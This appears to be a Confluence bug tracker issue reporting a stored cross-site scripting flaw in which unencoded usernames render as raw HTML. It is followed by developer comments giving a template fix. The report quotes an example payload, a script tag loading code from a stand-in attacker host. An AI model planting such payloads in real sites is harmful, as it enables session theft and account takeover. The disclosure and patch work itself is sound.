When signing up for an account, it is possible to enter a username like "<script src=http://drevil.com/xss>fred</script>". Confluence will accept this, and on certain pages, render it as raw HTML to the user, opening the possibility of cross-site scripting (XSS) attacks.

      Two places I've spotted the raw HTML so far:

      • Most prominently, when an admin goes to Manage Users -> Show All Users, and the username displays in the list, the raw HTML is rendered.
      • When editing a page created by such a user, the togglePermissions() javascript will display it, breaking later tags:

      if ($('edit-personal').checked) $('editPermission').value = "<script src=http://drevil.com/xss>fred</script>";

            [CONFSERVER-7615] XSS bug: usernames not HTML-encoded in all places

            Chris Kiehl added a comment - - edited

            If you are unable to upgrade to 2.9.1 you can fix this issue in your installation by editing one line in the file confluence/template/includes/menu-macros.vm which resides in your Confluence installation directory:

            Change

            #menuMacros_renderMenu("user-menu-link", $user.fullName, "user", "system.user")
            

            to

            #menuMacros_renderMenu("user-menu-link", $generalUtil.htmlEncode($user.fullName), "user", "system.user")
            

            Chris Kiehl added a comment - - edited If you are unable to upgrade to 2.9.1 you can fix this issue in your installation by editing one line in the file confluence/template/includes/menu-macros.vm which resides in your Confluence installation directory: Change #menuMacros_renderMenu( "user-menu-link" , $user.fullName, "user" , "system.user" ) to #menuMacros_renderMenu( "user-menu-link" , $generalUtil.htmlEncode($user.fullName), "user" , "system.user" )

            Chris Kiehl added a comment - - edited

            Those two cases are already fixed, but while looking for those two I found another place where data is written unescaped.

            Chris Kiehl added a comment - - edited Those two cases are already fixed, but while looking for those two I found another place where data is written unescaped.

            While usernames are still not encoded in all places, the signup is no longer possible, see CONF-7497

            Samuel Le Berrigaud added a comment - While usernames are still not encoded in all places, the signup is no longer possible, see CONF-7497

              ckiehl Chris Kiehl
              7ee5c68a815f Jeff Turner
              Affected customers:
              0 This affects my team
              Watchers:
              0 Start watching this issue

                Created:
                Updated:
                Resolved: